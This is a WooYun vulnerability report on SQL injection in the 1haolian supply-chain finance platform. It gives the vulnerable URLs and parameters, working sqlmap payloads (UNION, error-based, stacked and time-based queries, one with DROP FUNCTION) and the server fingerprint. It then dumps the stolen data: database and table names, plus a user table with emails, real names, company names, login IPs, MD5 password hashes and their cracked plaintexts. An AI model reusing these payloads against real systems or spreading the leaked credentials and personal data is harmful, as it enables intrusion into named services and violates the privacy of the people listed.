乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-30: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-02-12: 厂商已经主动忽略漏洞,细节向公众公开
金融安全之1号链中国首家供应链金融风控平台全网数据沦陷(合集)
http://www.1haolian.com/yhlnew/NewInfos.aspx?id=2617http://www.1haolian.com/yhlnew/AppliancesDataAnalysis.aspx?type=ya&doctype=1&owntype=1http://tvgo.1haolian.com/etvshop/ICanSupplyinfoManage.aspx?key=88952634&page=1 http://tvgo.1haolian.com/app/news/index.aspx?q=info&list=list&kwd=
都可以跨裤---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=3258' AND 3584=3584 AND 'Mzei'='Mzei Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=3258' AND 7683=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(115)+CHAR(117)+CHAR(113)+(SELECT (CASE WHEN (7683=7683) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(103)+CHAR(99)+CHAR(111)+CHAR(113))) AND 'TbMq'='TbMq Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: id=3258' UNION ALL SELECT NULL,CHAR(113)+CHAR(106)+CHAR(115)+CHAR(117)+CHAR(113)+CHAR(80)+CHAR(70)+CHAR(70)+CHAR(77)+CHAR(103)+CHAR(65)+CHAR(78)+CHAR(107)+CHAR(104)+CHAR(102)+CHAR(113)+CHAR(103)+CHAR(99)+CHAR(111)+CHAR(113),NULL,NULL,NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=3258'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=3258' WAITFOR DELAY '0:0:5'-----Place: GETParameter: key Type: boolean-based blind Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries Payload: key=88952634'); IF(3217=3217) SELECT 3217 ELSE DROP FUNCTION SHJe--&page=1 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: key=88952634') AND 6872=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(121)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6872=6872) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(109)+CHAR(114)+CHAR(115)+CHAR(113))) AND ('mCdB'='mCdB&page=1 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: key=88952634'); WAITFOR DELAY '0:0:5'--&page=1 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: key=88952634') WAITFOR DELAY '0:0:5'--&page=1 ---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008available databases [19]:[*] 1haolian[*] 1haolianDCJG[*] 1haolianetvshop[*] 1haolianPF[*] 1haolianTxzg[*] im[*] master[*] model[*] msdb[*] ReportServer$SCFSERVER[*] ReportServer$SCFSERVERTempDB[*] SCFSupplier[*] tempdb[*] test888888[*] TestYHLetvshop[*] WeixinQiYe[*] WeixinQiYeTest[*] yfx2.3[*] yhl0604Database: yhl0604Table: NT_User[10 entries]+--------------------------------------+------+-------+-------+--------+-----------+------------+----------------+-----+------+-------+--------------------+-----------------+-------+-------+-------+-------+--------+---------+--------+--------------------+---------+---------+--------------------+---------+-------------------+----------+----------------+----------+------------------------------------------+----------+----------+----------+-----------+-----------+-----------+-------------------------------------------+------------+------------+------------+-------------+------------+------------+----------------+-------------+--------------+--------------+--------------------+---------------+----------------+----------------+--------------------+----------------+----------------+------------------+---------------------+| ID | ImID | PopId | OrgID | UserID | InviterID | ProvinceID | OrganizationID | Sex | City | isRec | Email | RegIP | IsVip | Money | State | Click | Cnname | Mobile | inteyb | StaffNo | SexName | isAdmin | RegTime | Ouscope | OrgType | UserName | TrueName | integral | Password | Marriage | PhotoUrl | Portrait | UserCName | AttNumber | Homephone | Password2 | LoginTimes | LoginError | IsDisabled | VerifyCode | MobileCode | BindMoblie | LastLoginIP | ConfirmTime | ApproveState | MemberLevels | LastLoginTime | ThirdUserCode | IsBusinessUser | UserCreateType | LoginErrorTime | Departmentname | Personalstatus | ClientLoginCount | Currentpositionname |+--------------------------------------+------+-------+-------+--------+-----------+------------+----------------+-----+------+-------+--------------------+-----------------+-------+-------+-------+-------+--------+---------+--------+--------------------+---------+---------+--------------------+---------+-------------------+----------+----------------+----------+------------------------------------------+----------+----------+----------+-----------+-----------+-----------+-------------------------------------------+------------+------------+------------+-------------+------------+------------+----------------+-------------+--------------+--------------+--------------------+---------------+----------------+----------------+--------------------+----------------+----------------+------------------+---------------------+| NULL | NULL | 0 | NULL | 726 | 0 | 23 | NULL | 0 | 275 | 1 | [email protected] | 127.0.0.1 | 0 | 0.00 | 0 | 1793 | NULL | <blank> | 0 | NULL | NULL | 0 | 03 18 2012 11:02AM | 3 | NULL | ggfb | 公告发布者 | 120 | 827ccb0eea8a706c4c34a16891f84e7b (12345) | 0 | NULL | 863 | NULL | 0 | NULL | NULL | 4 | 1 | NULL | 21sV0ObGe2 | 84288 | 0 | 192.168.22.59 | NULL | NULL | 3 | 04 10 2012 9:56AM | NULL | 0 | NULL | 11 6 2014 9:56AM | NULL | NULL | NULL | NULL || 7e660146-9ca8-431f-9e60-a5ff70147f03 | NULL | 0 | NULL | 1863 | 0 | 0 | <blank> | 0 | 0 | 0 | [email protected] | | 0 | 0.00 | 0 | 158 | NULL | <blank> | 0 | 130528939253828000 | NULL | 0 | 08 19 2014 11:52AM | 3 | ServiceProvider | sp055 | 谭春香 | 205 | 827ccb0eea8a706c4c34a16891f84e7b (12345) | 0 | NULL | 0 | NULL | 0 | NULL | NULL | 66 | 0 | NULL | 178Sm399TZ | 28994 | 0 | 58.240.235.146 | NULL | 0 | 17 | 06 2 2015 1:13PM | NULL | 1 | BackofficeUser | 11 17 2014 1:48PM | NULL | NULL | NULL | NULL || 186e845a-c497-405a-b8e1-056b8f6873c0 | NULL | 0 | NULL | 35782 | 0 | 0 | <blank> | 0 | 0 | 0 | [email protected] | | 0 | 0.00 | 0 | 402 | NULL | <blank> | 0 | 130473601231956000 | NULL | 0 | 06 16 2014 10:42AM | 3 | ServiceProvider | tcx | 广州生命之光电子科技有限公司 | 388 | 827ccb0eea8a706c4c34a16891f84e7b (12345) | 0 | NULL | 0 | NULL | 0 | NULL | NULL | 13 | 0 | NULL | 178Sm399TZ | 17853 | 0 | 58.240.235.146 | NULL | 0 | 17 | 11 20 2014 11:52AM | NULL | 1 | BackofficeUser | 11 6 2014 9:56AM | NULL | NULL | NULL | NULL || 7e660146-9ca8-431f-9e60-a5ff70147f03 | NULL | 0 | NULL | 1863 | 0 | 0 | <blank> | 0 | 0 | 0 | [email protected] | | 0 | 0.00 | 0 | 402 | NULL | <blank> | 0 | 130458166547208000 | NULL | 0 | 08 19 2014 11:52AM | 3 | BackofficeUser | hxr | 沈协伟 | 20 | 827ccb0eea8a706c4c34a16891f84e7b (12345) | 0 | NULL | 0 | NULL | 0 | NULL | NULL | 36 | 0 | NULL | 2Cy8Pft0gB | 83730 | 0 | 58.240.235.146 | NULL | 0 | 20 | 11 20 2014 11:52AM | NULL | 1 | BackofficeUser | 06 2 2015 1:13PM | NULL | NULL | NULL | NULL || 7e660146-9ca8-431f-9e60-a5ff70147f03 | NULL | 0 | NULL | 1944 | 0 | 0 | <blank> | 0 | 0 | 0 | [email protected] | | 0 | 0.00 | 0 | 41 | NULL | <blank> | 0 | 130473601231956000 | NULL | 0 | 05 29 2014 1:57PM | 3 | LogisticsProvider | tcx | 谭春香 | 15 | 827ccb0eea8a706c4c34a16891f84e7b (12345) | 0 | NULL | 0 | NULL | 0 | NULL | f053361b97692602673852855a837d43 (scf123) | 36 | 0 | NULL | ZvnyotFl6J | 14386 | 0 | 58.240.235.146 | NULL | 0 | 20 | 11 20 2014 11:52AM | NULL | 1 | BackofficeUser | 06 2 2015 1:13PM | NULL | NULL | NULL | NULL || db5a0c72-4f8a-4321-a869-55c3ac09bfc1 | NULL | 0 | NULL | 36067 | 0 | 0 | <blank> | 1 | 0 | 0 | [email protected] | | 0 | 0.00 | 0 | 26 | NULL | <blank> | 0 | 130699122755754000 | NULL | 0 | 08 14 2014 11:49AM | 3 | LogisticsProvider | tcx | 广州市伟宏电器有限公司 | 205 | 827ccb0eea8a706c4c34a16891f84e7b (12345) | 0 | NULL | 0 | NULL | 0 | NULL | NULL | 23 | 0 | NULL | ZvnyotFl6J | 74706 | 0 | 58.240.235.146 | NULL | 0 | 37 | 06 1 2015 11:52AM | NULL | 1 | BackofficeUser | 05 28 2015 4:24PM | NULL | NULL | NULL | NULL || 657cd3b4-f289-4e19-aa3b-b640826e36fb | NULL | 0 | NULL | 1944 | 0 | 0 | <blank> | 0 | 0 | 0 | [email protected] | | 0 | 0.00 | 0 | 122 | NULL | <blank> | 0 | 130458166547208000 | NULL | 0 | 08 19 2014 11:52AM | 3 | LogisticsProvider | hxr | 广州宏扬电器设备有限公司 | 17 | 827ccb0eea8a706c4c34a16891f84e7b (12345) | 0 | NULL | 0 | NULL | 0 | NULL | NULL | 36 | 0 | NULL | 3qA0ulzdzY | 17853 | 0 | 58.240.235.146 | NULL | 0 | 3 | 11 20 2014 11:52AM | NULL | 1 | BackofficeUser | 06 2 2015 1:13PM | NULL | NULL | NULL | NULL || 6ee4bee4-a846-4cf7-b481-df35f353dfba | NULL | 0 | NULL | 1944 | 0 | 0 | <blank> | 0 | 0 | 0 | [email protected] | | 0 | 0.00 | 0 | 41 | NULL | <blank> | 0 | 130529852503708000 | NULL | 0 | 08 19 2014 11:52AM | 3 | LogisticsProvider | tcx | 广州壹泰丰盛电器有限公司 | 17 | 827ccb0eea8a706c4c34a16891f84e7b (12345) | 0 | NULL | 0 | NULL | 0 | NULL | NULL | 38 | 0 | NULL | 178Sm399TZ | 66666 | 0 | 116.21.160.68 | NULL | 0 | 12 | 05 28 2015 10:03AM | NULL | 1 | BackofficeUser | 05 28 2015 10:02AM | NULL | NULL | NULL | NULL || 7e660146-9ca8-431f-9e60-a5ff70147f03 | NULL | 0 | NULL | 18738 | 0 | 0 | <blank> | 0 | 0 | 0 | [email protected] | | 0 | 0.00 | 0 | 26 | NULL | <blank> | 0 | 130528939253828000 | NULL | 0 | 08 19 2014 11:52AM | 3 | BackofficeUser | tcx | 安迅物流有限公司 | 205 | 827ccb0eea8a706c4c34a16891f84e7b (12345) | 0 | NULL | 0 | NULL | 0 | NULL | NULL | 36 | 0 | NULL | 178Sm399TZ | 45987 | 0 | 58.240.235.146 | NULL | 0 | 205 | 06 2 2015 1:13PM | NULL | 1 | BackofficeUser | 11 17 2014 1:48PM | NULL | NULL | NULL | NULL || 7e660146-9ca8-431f-9e60-a5ff70147f03 | NULL | 0 | NULL | 1944 | 0 | 0 | <blank> | 0 | 0 | 0 | [email protected] | | 0 | 0.00 | 0 | 160 | NULL | <blank> | 0 | 130524617790856000 | NULL | 0 | 08 19 2014 11:52AM | 3 | LogisticsProvider | lg036 | 胡雪荣 | 17 | 827ccb0eea8a706c4c34a16891f84e7b (12345) | 0 | NULL | 0 | NULL | 0 | NULL | f053361b97692602673852855a837d43 (scf123) | 38 | 0 | NULL | i20xpBLgVK | 17853 | 0 | 58.240.235.146 | NULL | 0 | 17 | 06 1 2015 11:52AM | NULL | 1 | BackofficeUser | 11 17 2014 1:48PM | NULL | NULL | NULL | NULL |+--------------------------------------+------+-------+-------+--------+-----------+------------+----------------+-----+------+-------+--------------------+-----------------+-------+-------+-------+-------+--------+---------+--------+--------------------+---------+---------+--------------------+---------+-------------------+----------+----------------+----------+------------------------------------------+----------+----------+----------+-----------+-----------+-----------+-------------------------------------------+------------+------------+------------+-------------+------------+------------+----------------+-------------+--------------+--------------+--------------------+---------------+----------------+----------------+--------------------+----------------+----------------+------------------+---------------------+back-end DBMS: Microsoft SQL Server 2008Database: yhl0604[530 tables]+-----------------------------------------------------+| AKNet_helps || AKNnet_coms || A_AdvancesPriceDB || A_CostManagementDB || A_CostManagementType || A_CostManagementUnits || A_Deliveryfa || B2BFee || B2BFee_Details || Busshop_Trench || CO_Base_BankToScf || CO_Base_CreditManager || CO_Base_CreditManager_AmountTrace || CO_Base_CreditManager_Promote || CO_Base_CreditProduct || CO_Base_CreditProvider || CO_Pool_ApplyUserInfo || CO_Pool_CreditManagerOrder || CO_Pool_CreditUserOrder || CO_Settings_City || CO_Settings_CreditProductFeature || CO_Settings_CreditProductType || CO_Settings_CreditProviderType || CO_Settings_Province || CashFlowAccount || Chain_EnterpriseInfo || Chain_NameParam || Chain_Productapplyinformation || Chain_Productinformation || Chain_ProductsImg || Chain_ProductsInfo || Chain_RecommendProduct |Database: WeixinQiYeTest[201 tables]+-----------------------------------------------------+| Crm_CustomerVisitHistory || Crm_CustomerVisitRpt || Msg_ChatHistory || Msg_EnterpriseLatestNews || Msg_LatestNewsForCust || Msg_Message || Msg_MessageSummary || Msg_SendMessageHistory || Msg_UserDynamicTracking || Msg_UserWarningInfo || Sys_Config || Sys_DefaultImage |Database: 1haolian[595 tables]+-----------------------------------------------------+| AKNet_helps || AKNnet_coms || A_AdvancesPriceDB || A_CostManagementDB || A_CostManagementType || A_CostManagementUnits || A_Deliveryfa || B2BFee || B2BFee_Details || Busshop_Trench || CO_Base_BankToScf || CO_Base_CreditManager || CO_Base_CreditManager_AmountTrace || CO_Base_CreditManager_Promote || CO_Base_CreditProduct || CO_Base_CreditProvider || CO_Pool_ApplyUserInfo || CO_Pool_CreditManagerOrder || CO_Pool_CreditUserOrder || CO_Settings_City || CO_Settings_CreditProductFeature || CO_Settings_CreditProductType || CO_Settings_CreditProviderType || CO_Settings_Province || CashFlowAccount || Chain_Attention || Chain_EnterpriseInfo || Chain_NameParam || Chain_Productapplyinformation || Chain_Productinformation || Chain_ProductsImg || Chain_ProductsInfo || Chain_RecommendProduct || Chain_RecommendProductUserInfo || Chain_ShopFolder || Chain_ShopsWebmasterRelation || Chain_SiteCaptainFolder || Chain_StationMainProductPar || Core_AssessmentItemInfo || Core_Blackboard || Core_DataCollectInfo || Core_IndustryDataModel || Core_IndustryInfo || Core_MerchantInfo || Core_ProductAssessmentMap || Core_ProductDataCollectMap || Core_ProductInfo || CreditSumPayment || D99_CMD || DrawBackPayment || DrawBackPayment_Details || Etvshop_HotSowProduct || Etvshop_Product_secend_class || Etvshop_Product_third_class || Etvshop_PurchaseDemand || Etvshop_PurchaseDemandApply || Etvshop_SupplyProduct || Etvshop_SupplyProductTrenchContact || Etvshop_SupplyProductTrenchSale || Etvshop_Trench || Etvshop_WeekSowProduct || FKBankStatements || FM_Base_Product || FM_Base_ProductRanking || FM_Base_Provider || Finance_DecutFeeSalesInvoice || Finance_DecutFeeSalesInvoice_ProductDetails || Finance_DecutFeeSalesInvoice_StatementLisDetails || Finance_InvoiceInfo || Finance_PaymentHistory || Finance_PaymentHistoryDetail || Finance_PrePaymentHistory || Finance_PrePaymentInfo || IndustrySector || IndustrySector_list || KNet_Finance_BankDirectAccess || KNet_Finance_BankPipeline || KNet_Finance_BankTransfer || KNet_Finance_ProcureReceive || KNet_Finance_ProcureReceive_Details || KNet_Finance_ProcureReturn || KNet_Finance_ProcureReturn_Details || KNet_Finance_Repayment || KNet_Finance_SalesReceive || KNet_Finance_SalesReceive_Details || KNet_Finance_SalesReturn || KNet_Finance_SalesReturn_Details || KNet_Finance_Transport || KNet_Finance_Transport_Details || KNet_Finance_WageList || KNet_Finance_WageListGet || KNet_Finance_WageSetting || KNet_Finance_WageTip || KNet_Procure_BaoPriceList || KNet_Procure_BaoPriceList_Details || KNet_Resource_OrganizationalStructure || KNet_Resource_OutManage || KNet_Resource_Staff || KNet_Sales_BaoPriceList || KNet_Sales_BaoPriceList_Details || KNet_Sales_BaoPriceList_PrinterValue || KNet_Sales_BaoPriceList_Printersetup || KNet_Sales_BaoPriceList_fuplist || KNet_Sales_BaoPriceList_fupsetup || KNet_Sales_ClientAppseting || KNet_Sales_ClientList || KNet_Sales_ClientList_AuthList || KNet_Sales_ContractList || KNet_Sales_ContractList_Details || KNet_Sales_ContractList_PrinterValue || KNet_Sales_ContractList_Printersetup || KNet_Sales_OutWareList || KNet_Sales_OutWareList_Details || KNet_Sales_OutWareList_FlowList || KNet_Sales_OutWareList_PrinterValue || KNet_Sales_OutWareList_Printersetup || KNet_Sales_PickupInfo || KNet_Sales_ReturnList || KNet_Sales_ReturnList_Details || KNet_Sales_ReturnList_FlowList || KNet_Sales_ReturnList_PrinterValue || KNet_Sales_ReturnList_Printersetup || KNet_Static_Area || KNet_Static_City || KNet_Static_Province || KNet_Static_Yd || KNet_Static_logs || KNet_Sys_AuthorityTable || KNet_Sys_AuthorityUserGroup || KNet_Sys_AuthorityUserGroupSetup || KNet_Sys_Authority_AuthList || KNet_Sys_Bank || KNet_Sys_BigCategories || KNet_Sys_CheckMethod || KNet_Sys_CheckNotes || KNet_Sys_Config || KNet_Sys_ProcurePack || KNet_Sys_ProcureType |
参数过滤
未能联系到厂商或者厂商积极拒绝
